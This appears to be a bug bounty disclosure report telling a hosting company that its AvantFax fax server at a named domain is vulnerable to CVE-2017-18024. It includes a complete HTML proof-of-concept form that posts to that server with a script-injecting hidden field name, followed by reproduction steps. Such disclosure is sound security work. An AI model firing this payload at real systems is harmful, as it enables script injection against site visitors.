Endless Group: XSS on https://fax.pbx.itsendless.org/ (CVE-2017-18024)

Summary:

Hello Endless Hosting,

I found an XSS on https://fax.pbx.itsendless.org/ . This domain running an AvantFax software 3.3.6
However, the exploit of CVE-2017-18024 for version 3.3.3 is working on that version.

Here is the exploit code of CVE-2017-18024

<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fax.pbx.itsendless.org/" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="admin" /> <input type="hidden" name="_submit_check" value="1" /> <input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

This code sending a POST request to the server and using a made-up hidden name to exploit the software with an XSS vulnerability.

Steps To Reproduce:

1. Please open the avantfax.html and that’s all.

Supporting Material/References:

CVE-2017-18024 Detail
https://nvd.nist.gov/vuln/detail/CVE-2017-18024#vulnCurrentDescriptionTitle

Impact

{F957416}

An attacker might be able to inject arbitrary html and script code into the web site. This would alter the appearance and would make it possible to initiate further attacks against site visitors.